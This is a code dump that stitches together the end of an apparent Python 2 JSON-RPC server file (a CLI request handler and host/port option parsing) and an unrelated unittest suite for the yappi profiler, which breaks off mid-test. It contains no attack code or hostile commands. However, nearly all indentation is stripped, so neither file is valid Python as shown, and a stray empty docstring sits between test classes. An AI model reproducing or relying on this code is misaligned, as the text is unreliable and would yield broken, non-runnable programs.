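# server in a child process so that stop_server() can shut it down later.
#
#     port = start_server(port=0, newprocess=True)  # 0 picks a free port
#     # ... issue JSON-RPC POST requests against http://localhost:<port> ...
#     stop_server()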
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
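# Invocation sketch, inferred from the argument handling in the __main__ block
# below (file names are illustrative):
#   python <this_server_file> in.json out.json [token-or-token-file]
#       runs a single JSON-RPC call through process_async_cli() and exits
#   python <this_server_file> --host=localhost --port=9999
#       serves requests with the single-threaded BaseHTTP server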
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
test_functionality.py
|
import os
import sys
import time
import yappi
import _yappi
import utils
import multiprocessing # added to fix http://bugs.python.org/issue15881 for > Py2.6
if sys.version_info < (2, 7): # use unittest2 for < Py2.7
import unittest2 as _unittest
else:
import unittest as _unittest
class BasicUsage(utils.YappiUnitTestCase):
def test_print_formatting(self):
def a():
pass
def b():
a()
        func_cols = {1: ("name", 48), 0: ("ncall", 5), 2: ("tsub", 8)}
        thread_cols = {1: ("name", 48), 0: ("ttot", 8)}
yappi.start()
a(); b();
yappi.stop()
fs = yappi.get_func_stats()
cs = fs[1].children
ts = yappi.get_thread_stats()
#fs.print_all(out=sys.stderr, columns={1:("name", 70), })
#cs.print_all(out=sys.stderr, columns=func_cols)
#ts.print_all(out=sys.stderr, columns=thread_cols)
#cs.print_all(out=sys.stderr, columns={})
self.assertRaises(yappi.YappiError, fs.print_all, columns={1:("namee",9)})
self.assertRaises(yappi.YappiError, cs.print_all, columns={1:("dd",0)})
self.assertRaises(yappi.YappiError, ts.print_all, columns={1:("tidd",0)})
def test_get_clock(self):
yappi.set_clock_type('cpu')
self.assertEqual('cpu', yappi.get_clock_type())
clock_info = yappi.get_clock_info()
self.assertTrue('api' in clock_info)
self.assertTrue('resolution' in clock_info)
yappi.set_clock_type('wall')
self.assertEqual('wall', yappi.get_clock_type())
t0 = yappi.get_clock_time()
time.sleep(0.1)
duration = yappi.get_clock_time() - t0
self.assertAlmostEqual(0.1, duration, places=2)
def test_profile_decorator(self):
def aggregate(func, stats):
fname = "%s.profile" % (func.__name__)
try:
stats.add(fname)
except IOError:
pass
stats.save(fname)
raise Exception("messing around")
@yappi.profile(return_callback=aggregate)
def a(x, y):
if x+y == 25:
raise Exception("")
return x+y
def b():
pass
try:
os.remove("a.profile") # remove the one from prev test, if available
except:
pass
# global profile is on to mess things up
yappi.start()
b()
# assert functionality and call function at same time
try:
self.assertEqual(a(1, 2), 3)
except:
pass
try:
self.assertEqual(a(2, 5), 7)
except:
pass
try:
a(4, 21)
except:
pass
stats = yappi.get_func_stats().add("a.profile")
fsa = utils.find_stat_by_name(stats, 'a')
self.assertEqual(fsa.ncall, 3)
self.assertEqual(len(stats), 1) # b() should be cleared out.
@yappi.profile(return_callback=aggregate)
def count_down_rec(n):
if n == 0:
return
count_down_rec(n-1)
try:
os.remove("count_down_rec.profile") # remove the one from prev test, if available
except:
pass
try:
count_down_rec(4)
except:
pass
try:
count_down_rec(3)
except:
pass
stats = yappi.YFuncStats("count_down_rec.profile")
fsrec = utils.find_stat_by_name(stats, 'count_down_rec')
self.assertEqual(fsrec.ncall, 9)
self.assertEqual(fsrec.nactualcall, 2)
def test_strip_dirs(self):
def a():
pass
stats = utils.run_and_get_func_stats(a,)
stats.strip_dirs()
fsa = utils.find_stat_by_name(stats, "a")
self.assertEqual(fsa.module, os.path.basename(fsa.module))
def test_yappi_overhead(self):
import time
LOOP_COUNT = 10000
def a(): pass
def b():
for i in range(LOOP_COUNT): a()
t0 = time.time()
yappi.start()
b()
yappi.stop()
time_with_yappi = time.time() - t0
t0 = time.time()
b()
time_without_yappi = time.time() - t0
if time_without_yappi == 0:
time_without_yappi = 0.000001
        # in the latest v0.82, I calculated this as close to "7.0" on my machine.
        # However, 83% of this overhead comes from tickcount(). The other 17%
        # seems to be evenly distributed across the internal bookkeeping
        # structures/algorithms, which seems acceptable. Note that our test only
        # profiles one function at a time over a short interval. Profiling a
        # high number of functions in a short time is a different beast (and
        # pretty unlikely in most applications). So, as a conclusion: I cannot
        # see any optimization window for Yappi that is worth implementing, as
        # we would only be optimizing 17% of the time.
        sys.stderr.write(
            "\r\nYappi adds %0.1fx overhead to the profiled application on average.\r\n" %
            (time_with_yappi / time_without_yappi))
def test_clear_stats_while_running(self):
def a():
pass
yappi.start()
a()
yappi.clear_stats()
a()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
self.assertEqual(fsa.ncall, 1)
def test_generator(self):
def _gen(n):
while(n > 0):
yield n
n -= 1
yappi.start()
for x in _gen(5):
pass
self.assertTrue(yappi.convert2pstats(yappi.get_func_stats()) is not None)
def test_slice_child_stats_and_strip_dirs(self):
def b():
for i in range(10000000): pass
def a():
b()
yappi.start(builtins=True)
a()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
self.assertTrue(fsa.children[0:1] is not None)
prev_afullname = fsa.full_name
prev_bchildfullname = fsa.children[fsb].full_name
stats.strip_dirs()
self.assertTrue(len(prev_afullname) > len(fsa.full_name))
self.assertTrue(len(prev_bchildfullname) > len(fsa.children[fsb].full_name))
def test_children_stat_functions(self):
_timings = {"a_1":5, "b_1":3, "c_1":1}
_yappi._set_test_timings(_timings)
def b():
pass
def c():
pass
def a():
b()
c()
yappi.start()
a()
b() # non-child call
c() # non-child call
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
childs_of_a = fsa.children.get().sort("tavg", "desc")
prev_item = None
for item in childs_of_a:
if prev_item:
self.assertTrue(prev_item.tavg > item.tavg)
prev_item = item
childs_of_a.sort("name", "desc")
prev_item = None
for item in childs_of_a:
if prev_item:
self.assertTrue(prev_item.name > item.name)
prev_item = item
childs_of_a.clear()
self.assertTrue(childs_of_a.empty())
def test_no_stats_different_clock_type_load(self):
def a(): pass
yappi.start()
a()
yappi.stop()
yappi.get_func_stats().save("ystats1.ys")
yappi.clear_stats()
yappi.set_clock_type("WALL")
yappi.start()
yappi.stop()
stats = yappi.get_func_stats().add("ystats1.ys")
fsa = utils.find_stat_by_name(stats, 'a')
self.assertTrue(fsa is not None)
def test_subsequent_profile(self):
_timings = {"a_1":1, "b_1":1}
_yappi._set_test_timings(_timings)
def a(): pass
def b(): pass
yappi.start()
a()
yappi.stop()
yappi.start()
b()
yappi.stop()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
self.assertTrue(fsa is not None)
self.assertTrue(fsb is not None)
self.assertEqual(fsa.ttot, 1)
self.assertEqual(fsb.ttot, 1)
def test_lambda(self):
import time
f = lambda : time.sleep(0.3)
yappi.set_clock_type("wall")
yappi.start()
f()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, '<lambda>')
self.assertTrue(fsa.ttot > 0.1)
def test_module_stress(self):
self.assertEqual(yappi.is_running(), False)
yappi.start()
yappi.clear_stats()
self.assertRaises(_yappi.error, yappi.set_clock_type, "wall")
yappi.stop()
yappi.clear_stats()
yappi.set_clock_type("cpu")
self.assertRaises(yappi.YappiError, yappi.set_clock_type, "dummy")
self.assertEqual(yappi.is_running(), False)
yappi.clear_stats()
yappi.clear_stats()
def test_stat_sorting(self):
_timings = {"a_1":13,"b_1":10,"a_2":6,"b_2":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
b()
def b():
if self._ncall == 2:
return
self._ncall += 1
a()
stats = utils.run_and_get_func_stats(a)
stats = stats.sort("totaltime", "desc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.ttot >= stat.ttot)
prev_stat = stat
stats = stats.sort("totaltime", "asc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.ttot <= stat.ttot)
prev_stat = stat
stats = stats.sort("avgtime", "asc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.tavg <= stat.tavg)
prev_stat = stat
stats = stats.sort("name", "asc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.name <= stat.name)
prev_stat = stat
stats = stats.sort("subtime", "asc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.tsub <= stat.tsub)
prev_stat = stat
self.assertRaises(yappi.YappiError, stats.sort, "invalid_func_sorttype_arg")
self.assertRaises(yappi.YappiError, stats.sort, "totaltime", "invalid_func_sortorder_arg")
def test_start_flags(self):
self.assertEqual(_yappi._get_start_flags(), None)
yappi.start()
def a(): pass
a()
self.assertEqual(_yappi._get_start_flags()["profile_builtins"], 0)
self.assertEqual(_yappi._get_start_flags()["profile_multithread"], 1)
self.assertEqual(len(yappi.get_thread_stats()), 1)
def test_builtin_profiling(self):
import threading
def a():
import time
time.sleep(0.4) # is a builtin function
yappi.set_clock_type('wall')
yappi.start(builtins=True)
a()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'sleep')
self.assertTrue(fsa is not None)
self.assertTrue(fsa.ttot > 0.3)
yappi.stop()
yappi.clear_stats()
def a():
pass
yappi.start()
t = threading.Thread(target=a)
t.start()
t.join()
stats = yappi.get_func_stats()
def test_singlethread_profiling(self):
import threading
import time
yappi.set_clock_type('wall')
def a():
time.sleep(0.2)
class Worker1(threading.Thread):
def a(self):
time.sleep(0.3)
def run(self):
self.a()
yappi.start(profile_threads=False)
c = Worker1()
c.start()
c.join()
a()
stats = yappi.get_func_stats()
fsa1 = utils.find_stat_by_name(stats, 'Worker1.a')
fsa2 = utils.find_stat_by_name(stats, 'a')
self.assertTrue(fsa1 is None)
self.assertTrue(fsa2 is not None)
self.assertTrue(fsa2.ttot > 0.1)
class StatSaveScenarios(utils.YappiUnitTestCase):
def test_pstats_conversion(self):
def pstat_id(fs):
return (fs.module, fs.lineno, fs.name)
def a():
d()
def b():
d()
def c():
pass
def d():
pass
_timings = {"a_1":12,"b_1":7,"c_1":5,"d_1":2}
_yappi._set_test_timings(_timings)
stats = utils.run_and_get_func_stats(a,)
stats.strip_dirs()
stats.save("a1.pstats", type="pstat")
fsa_pid = pstat_id(utils.find_stat_by_name(stats, "a"))
fsd_pid = pstat_id(utils.find_stat_by_name(stats, "d"))
yappi.clear_stats()
_yappi._set_test_timings(_timings)
stats = utils.run_and_get_func_stats(a,)
stats.strip_dirs()
stats.save("a2.pstats", type="pstat")
yappi.clear_stats()
_yappi._set_test_timings(_timings)
stats = utils.run_and_get_func_stats(b,)
stats.strip_dirs()
stats.save("b1.pstats", type="pstat")
fsb_pid = pstat_id(utils.find_stat_by_name(stats, "b"))
yappi.clear_stats()
_yappi._set_test_timings(_timings)
stats = utils.run_and_get_func_stats(c,)
stats.strip_dirs()
stats.save("c1.pstats", type="pstat")
fsc_pid = pstat_id(utils.find_stat_by_name(stats, "c"))
# merge saved stats and check pstats values are correct
import pstats
p = pstats.Stats('a1.pstats', 'a2.pstats', 'b1.pstats', 'c1.pstats')
p.strip_dirs()
# ct = ttot, tt = tsub
(cc, nc, tt, ct, callers) = p.stats[fsa_pid]
self.assertEqual(cc, nc, 2)
self.assertEqual(tt, 20)
self.assertEqual(ct, 24)
(cc, nc, tt, ct, callers) = p.stats[fsd_pid]
self.assertEqual(cc, nc, 3)
self.assertEqual(tt, 6)
self.assertEqual(ct, 6)
self.assertEqual(len(callers), 2)
(cc, nc, tt, ct) = callers[fsa_pid]
self.assertEqual(cc, nc, 2)
self.assertEqual(tt, 4)
self.assertEqual(ct, 4)
(cc, nc, tt, ct) = callers[fsb_pid]
self.assertEqual(cc, nc, 1)
self.assertEqual(tt, 2)
self.assertEqual(ct, 2)
def test_merge_stats(self):
_timings = {"a_1":15,"b_1":14,"c_1":12,"d_1":10,"e_1":9,"f_1":7,"g_1":6,"h_1":5,"i_1":1}
_yappi._set_test_timings(_timings)
def a():
b()
def b():
c()
def c():
d()
def d():
e()
def e():
f()
def f():
g()
def g():
h()
def h():
i()
def i():
pass
yappi.start()
a()
a()
yappi.stop()
stats = yappi.get_func_stats()
self.assertRaises(NotImplementedError, stats.save, "", "INVALID_SAVE_TYPE")
stats.save("ystats2.ys")
yappi.clear_stats()
_yappi._set_test_timings(_timings)
yappi.start()
a()
stats = yappi.get_func_stats().add("ystats2.ys")
fsa = utils.find_stat_by_name(stats, "a")
fsb = utils.find_stat_by_name(stats, "b")
fsc = utils.find_stat_by_name(stats, "c")
fsd = utils.find_stat_by_name(stats, "d")
fse = utils.find_stat_by_name(stats, "e")
fsf = utils.find_stat_by_name(stats, "f")
fsg = utils.find_stat_by_name(stats, "g")
fsh = utils.find_stat_by_name(stats, "h")
fsi = utils.find_stat_by_name(stats, "i")
self.assertEqual(fsa.ttot, 45)
self.assertEqual(fsa.ncall, 3)
self.assertEqual(fsa.nactualcall, 3)
self.assertEqual(fsa.tsub, 3)
self.assertEqual(fsa.children[fsb].ttot, fsb.ttot)
self.assertEqual(fsa.children[fsb].tsub, fsb.tsub)
self.assertEqual(fsb.children[fsc].ttot, fsc.ttot)
self.assertEqual(fsb.children[fsc].tsub, fsc.tsub)
self.assertEqual(fsc.tsub, 6)
self.assertEqual(fsc.children[fsd].ttot, fsd.ttot)
self.assertEqual(fsc.children[fsd].tsub, fsd.tsub)
self.assertEqual(fsd.children[fse].ttot, fse.ttot)
self.assertEqual(fsd.children[fse].tsub, fse.tsub)
self.assertEqual(fse.children[fsf].ttot, fsf.ttot)
self.assertEqual(fse.children[fsf].tsub, fsf.tsub)
self.assertEqual(fsf.children[fsg].ttot, fsg.ttot)
self.assertEqual(fsf.children[fsg].tsub, fsg.tsub)
self.assertEqual(fsg.ttot, 18)
self.assertEqual(fsg.tsub, 3)
self.assertEqual(fsg.children[fsh].ttot, fsh.ttot)
self.assertEqual(fsg.children[fsh].tsub, fsh.tsub)
self.assertEqual(fsh.ttot, 15)
self.assertEqual(fsh.tsub, 12)
self.assertEqual(fsh.tavg, 5)
self.assertEqual(fsh.children[fsi].ttot, fsi.ttot)
self.assertEqual(fsh.children[fsi].tsub, fsi.tsub)
#stats.debug_print()
def test_merge_multithreaded_stats(self):
import threading
import _yappi
timings = {"a_1":2, "b_1":1}
_yappi._set_test_timings(timings)
def a(): pass
def b(): pass
yappi.start()
t = threading.Thread(target=a)
t.start()
t.join()
t = threading.Thread(target=b)
t.start()
t.join()
yappi.get_func_stats().save("ystats1.ys")
yappi.clear_stats()
_yappi._set_test_timings(timings)
self.assertEqual(len(yappi.get_func_stats()), 0)
self.assertEqual(len(yappi.get_thread_stats()), 1)
t = threading.Thread(target=a)
t.start()
t.join()
self.assertEqual(_yappi._get_start_flags()["profile_builtins"], 0)
self.assertEqual(_yappi._get_start_flags()["profile_multithread"], 1)
yappi.get_func_stats().save("ystats2.ys")
stats = yappi.YFuncStats(["ystats1.ys", "ystats2.ys",])
fsa = utils.find_stat_by_name(stats, "a")
fsb = utils.find_stat_by_name(stats, "b")
self.assertEqual(fsa.ncall, 2)
self.assertEqual(fsb.ncall, 1)
self.assertEqual(fsa.tsub, fsa.ttot, 4)
self.assertEqual(fsb.tsub, fsb.ttot, 1)
def test_merge_load_different_clock_types(self):
import threading
yappi.start(builtins=True)
def a(): b()
def b(): c()
def c(): pass
t = threading.Thread(target=a)
t.start()
t.join()
yappi.get_func_stats().sort("name", "asc").save("ystats1.ys")
yappi.stop()
yappi.clear_stats()
yappi.start(builtins=False)
t = threading.Thread(target=a)
t.start()
t.join()
yappi.get_func_stats().save("ystats2.ys")
yappi.stop()
self.assertRaises(_yappi.error, yappi.set_clock_type, "wall")
yappi.clear_stats()
yappi.set_clock_type("wall")
yappi.start()
t = threading.Thread(target=a)
t.start()
t.join()
yappi.get_func_stats().save("ystats3.ys")
self.assertRaises(yappi.YappiError, yappi.YFuncStats().add("ystats1.ys").add, "ystats3.ys")
stats = yappi.YFuncStats(["ystats1.ys", "ystats2.ys"]).sort("name")
fsa = utils.find_stat_by_name(stats, "a")
fsb = utils.find_stat_by_name(stats, "b")
fsc = utils.find_stat_by_name(stats, "c")
self.assertEqual(fsa.ncall, 2)
self.assertEqual(fsa.ncall, fsb.ncall, fsc.ncall)
def test_merge_aabab_aabbc(self):
_timings = {"a_1":15,"a_2":14,"b_1":12,"a_3":10,"b_2":9, "c_1":4}
_yappi._set_test_timings(_timings)
def a():
if self._ncall == 1:
self._ncall += 1
a()
elif self._ncall == 5:
self._ncall += 1
a()
else:
b()
def b():
if self._ncall == 2:
self._ncall += 1
a()
elif self._ncall == 6:
self._ncall += 1
b()
elif self._ncall == 7:
c()
else:
return
def c():
pass
self._ncall = 1
stats = utils.run_and_get_func_stats(a,)
stats.save("ystats1.ys")
yappi.clear_stats()
_yappi._set_test_timings(_timings)
#stats.print_all()
self._ncall = 5
stats = utils.run_and_get_func_stats(a,)
stats.save("ystats2.ys")
#stats.print_all()
def a(): # same name but another function(code object)
pass
yappi.start()
a()
stats = yappi.get_func_stats().add(["ystats1.ys", "ystats2.ys"])
#stats.print_all()
self.assertEqual(len(stats), 4)
fsa = None
for stat in stats:
if stat.name == "a" and stat.ttot == 45:
fsa = stat
break
self.assertTrue(fsa is not None)
self.assertEqual(fsa.ncall, 7)
self.assertEqual(fsa.nactualcall, 3)
self.assertEqual(fsa.ttot, 45)
self.assertEqual(fsa.tsub, 10)
fsb = utils.find_stat_by_name(stats, "b")
fsc = utils.find_stat_by_name(stats, "c")
self.assertEqual(fsb.ncall, 6)
self.assertEqual(fsb.nactualcall, 3)
self.assertEqual(fsb.ttot, 36)
self.assertEqual(fsb.tsub, 27)
self.assertEqual(fsb.tavg, 6)
self.assertEqual(fsc.ttot, 8)
self.assertEqual(fsc.tsub, 8)
self.assertEqual(fsc.tavg, 4)
self.assertEqual(fsc.nactualcall, fsc.ncall, 2)
"""
"""
class MultithreadedScenarios(utils.YappiUnitTestCase):
def test_subsequent_profile(self):
import threading
WORKER_COUNT = 5
def a(): pass
def b(): pass
def c(): pass
_timings = {"a_1":3,"b_1":2,"c_1":1,}
yappi.start()
def g(): pass
g()
yappi.stop()
yappi.clear_stats()
_yappi._set_test_timings(_timings)
yappi.start()
_dummy = []
for i in range(WORKER_COUNT):
t = threading.Thread(target=a)
t.start()
t.join()
for i in range(WORKER_COUNT):
t = threading.Thread(target=b)
t.start()
_dummy.append(t)
t.join()
for i in range(WORKER_COUNT):
t = threading.Thread(target=a)
t.start()
t.join()
for i in range(WORKER_COUNT):
t = threading.Thread(target=c)
t.start()
t.join()
yappi.stop()
yappi.start()
def f():
pass
f()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
self.assertEqual(fsa.ncall, 10)
self.assertEqual(fsb.ncall, 5)
self.assertEqual(fsc.ncall, 5)
self.assertEqual(fsa.ttot, fsa.tsub, 30)
self.assertEqual(fsb.ttot, fsb.tsub, 10)
self.assertEqual(fsc.ttot, fsc.tsub, 5)
        # macOS optimizes by only creating one worker thread
self.assertTrue(len(yappi.get_thread_stats()) >= 2)
def test_basic(self):
import threading
import time
yappi.set_clock_type('wall')
def a():
time.sleep(0.2)
class Worker1(threading.Thread):
def a(self):
time.sleep(0.3)
def run(self):
self.a()
yappi.start(builtins=False, profile_threads=True)
c = Worker1()
c.start()
c.join()
a()
stats = yappi.get_func_stats()
fsa1 = utils.find_stat_by_name(stats, 'Worker1.a')
fsa2 = utils.find_stat_by_name(stats, 'a')
self.assertTrue(fsa1 is not None)
self.assertTrue(fsa2 is not None)
self.assertTrue(fsa1.ttot > 0.2)
self.assertTrue(fsa2.ttot > 0.1)
tstats = yappi.get_thread_stats()
self.assertEqual(len(tstats), 2)
tsa = utils.find_stat_by_name(tstats, 'Worker1')
tsm = utils.find_stat_by_name(tstats, '_MainThread')
self.assertTrue(tsa is not None)
self.assertTrue(tsm is not None) # FIX: I see this fails sometimes?
def test_ctx_stats(self):
from threading import Thread
DUMMY_WORKER_COUNT = 5
yappi.start()
class DummyThread(Thread): pass
def dummy_worker():
pass
for i in range(DUMMY_WORKER_COUNT):
t = DummyThread(target=dummy_worker)
t.start()
t.join()
yappi.stop()
stats = yappi.get_thread_stats()
tsa = utils.find_stat_by_name(stats, "DummyThread")
self.assertTrue(tsa is not None)
yappi.clear_stats()
import time
time.sleep(1.0)
_timings = {"a_1":6,"b_1":5,"c_1":3, "d_1":1, "a_2":4,"b_2":3,"c_2":2, "d_2":1}
_yappi._set_test_timings(_timings)
class Thread1(Thread): pass
class Thread2(Thread): pass
def a():
b()
def b():
c()
def c():
d()
def d():
time.sleep(0.6)
yappi.set_clock_type("wall")
yappi.start()
t1 = Thread1(target=a)
t1.start()
t2 = Thread2(target=a)
t2.start()
t1.join()
t2.join()
stats = yappi.get_thread_stats()
        # the first clear_stats clears the context table?
tsa = utils.find_stat_by_name(stats, "DummyThread")
self.assertTrue(tsa is None)
tst1 = utils.find_stat_by_name(stats, "Thread1")
tst2 = utils.find_stat_by_name(stats, "Thread2")
tsmain = utils.find_stat_by_name(stats, "_MainThread")
#stats.print_all()
self.assertTrue(len(stats) == 3)
self.assertTrue(tst1 is not None)
self.assertTrue(tst2 is not None)
        self.assertTrue(tsmain is not None) # I see this fail sometimes, probably
        # because Py_ImportNoBlock() sometimes fails to import and get the
        # thread class name.
self.assertTrue(1.0 > tst2.ttot >= 0.5)
self.assertTrue(1.0 > tst1.ttot >= 0.5)
# test sorting of the ctx stats
stats = stats.sort("totaltime", "desc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.ttot >= stat.ttot)
prev_stat = stat
stats = stats.sort("totaltime", "asc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.ttot <= stat.ttot)
prev_stat = stat
stats = stats.sort("schedcount", "desc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.sched_count >= stat.sched_count)
prev_stat = stat
stats = stats.sort("name", "desc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.name >= stat.name)
prev_stat = stat
self.assertRaises(yappi.YappiError, stats.sort, "invalid_thread_sorttype_arg")
self.assertRaises(yappi.YappiError, stats.sort, "invalid_thread_sortorder_arg")
def test_producer_consumer_with_queues(self):
# we currently just stress yappi, no functionality test is done here.
yappi.start()
import time
if utils.is_py3x():
from queue import Queue
else:
from Queue import Queue
from threading import Thread
WORKER_THREAD_COUNT = 50
WORK_ITEM_COUNT = 2000
def worker():
while True:
item = q.get()
# do the work with item
q.task_done()
q = Queue()
for i in range(WORKER_THREAD_COUNT):
t = Thread(target=worker)
t.daemon = True
t.start()
for item in range(WORK_ITEM_COUNT):
q.put(item)
        q.join()  # block until all tasks are done
#yappi.get_func_stats().sort("callcount").print_all()
yappi.stop()
def test_temporary_lock_waiting(self):
import threading
import time
yappi.start()
_lock = threading.Lock()
def worker():
_lock.acquire()
try:
time.sleep(1.0)
finally:
_lock.release()
t1 = threading.Thread(target=worker)
t2 = threading.Thread(target=worker)
t1.start()
t2.start()
t1.join()
t2.join()
#yappi.get_func_stats().sort("callcount").print_all()
yappi.stop()
@_unittest.skipIf(os.name != "posix", "requires Posix compliant OS")
def test_signals_with_blocking_calls(self):
import signal, os, time
# just to verify if signal is handled correctly and stats/yappi are not corrupted.
def handler(signum, frame):
raise Exception("Signal handler executed!")
yappi.start()
signal.signal(signal.SIGALRM, handler)
signal.alarm(1)
self.assertRaises(Exception, time.sleep, 2)
stats = yappi.get_func_stats()
fsh = utils.find_stat_by_name(stats, "handler")
self.assertTrue(fsh is not None)
@_unittest.skipIf(not sys.version_info >= (3, 2), "requires Python 3.2")
def test_concurrent_futures(self):
yappi.start()
import time
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(max_workers=5) as executor:
f = executor.submit(pow, 5, 2)
self.assertEqual(f.result(), 25)
time.sleep(1.0)
yappi.stop()
@_unittest.skipIf(not sys.version_info >= (3, 2), "requires Python 3.2")
def test_barrier(self):
yappi.start()
import threading
b = threading.Barrier(2, timeout=1)
def worker():
try:
b.wait()
except threading.BrokenBarrierError:
pass
except Exception:
raise Exception("BrokenBarrierError not raised")
t1 = threading.Thread(target=worker)
t1.start()
#b.wait()
t1.join()
yappi.stop()
class NonRecursiveFunctions(utils.YappiUnitTestCase):
def test_abcd(self):
_timings = {"a_1":6,"b_1":5,"c_1":3, "d_1":1}
_yappi._set_test_timings(_timings)
def a():
b()
def b():
c()
def c():
d()
def d():
pass
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
fsd = utils.find_stat_by_name(stats, 'd')
cfsab = fsa.children[fsb]
cfsbc = fsb.children[fsc]
cfscd = fsc.children[fsd]
self.assertEqual(fsa.ttot , 6)
self.assertEqual(fsa.tsub , 1)
self.assertEqual(fsb.ttot , 5)
self.assertEqual(fsb.tsub , 2)
self.assertEqual(fsc.ttot , 3)
self.assertEqual(fsc.tsub , 2)
self.assertEqual(fsd.ttot , 1)
self.assertEqual(fsd.tsub , 1)
self.assertEqual(cfsab.ttot , 5)
self.assertEqual(cfsab.tsub , 2)
self.assertEqual(cfsbc.ttot , 3)
self.assertEqual(cfsbc.tsub , 2)
self.assertEqual(cfscd.ttot , 1)
self.assertEqual(cfscd.tsub , 1)
def test_stop_in_middle(self):
import time
_timings = {"a_1":6,"b_1":4}
_yappi._set_test_timings(_timings)
def a():
b()
yappi.stop()
def b():
time.sleep(0.2)
yappi.start()
a()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
self.assertEqual(fsa.ncall , 1)
self.assertEqual(fsa.nactualcall, 0)
self.assertEqual(fsa.ttot , 0) # no call_leave called
self.assertEqual(fsa.tsub , 0) # no call_leave called
self.assertEqual(fsb.ttot , 4)
class RecursiveFunctions(utils.YappiUnitTestCase):
def test_fibonacci(self):
def fib(n):
if n > 1:
return fib(n-1) + fib(n-2)
else:
return n
stats = utils.run_and_get_func_stats(fib, 22)
fs = utils.find_stat_by_name(stats, 'fib')
self.assertEqual(fs.ncall, 57313)
self.assertEqual(fs.ttot, fs.tsub)
def test_abcadc(self):
_timings = {"a_1":20,"b_1":19,"c_1":17, "a_2":13, "d_1":12, "c_2":10, "a_3":5}
_yappi._set_test_timings(_timings)
def a(n):
if n == 3:
return
if n == 1 + 1:
d(n)
else:
b(n)
def b(n):
c(n)
def c(n):
a(n+1)
def d(n):
c(n)
stats = utils.run_and_get_func_stats(a, 1)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
fsd = utils.find_stat_by_name(stats, 'd')
self.assertEqual(fsa.ncall, 3)
self.assertEqual(fsa.nactualcall, 1)
self.assertEqual(fsa.ttot, 20)
self.assertEqual(fsa.tsub, 7)
self.assertEqual(fsb.ttot, 19)
self.assertEqual(fsb.tsub, 2)
self.assertEqual(fsc.ttot, 17)
self.assertEqual(fsc.tsub, 9)
self.assertEqual(fsd.ttot, 12)
self.assertEqual(fsd.tsub, 2)
cfsca = fsc.children[fsa]
self.assertEqual(cfsca.nactualcall, 0)
self.assertEqual(cfsca.ncall, 2)
self.assertEqual(cfsca.ttot, 13)
self.assertEqual(cfsca.tsub, 6)
def test_aaaa(self):
_timings = {"d_1":9, "d_2":7, "d_3":3, "d_4":2}
_yappi._set_test_timings(_timings)
def d(n):
if n == 3:
return
d(n+1)
stats = utils.run_and_get_func_stats(d, 0)
fsd = utils.find_stat_by_name(stats, 'd')
self.assertEqual(fsd.ncall , 4)
self.assertEqual(fsd.nactualcall , 1)
self.assertEqual(fsd.ttot , 9)
self.assertEqual(fsd.tsub , 9)
cfsdd = fsd.children[fsd]
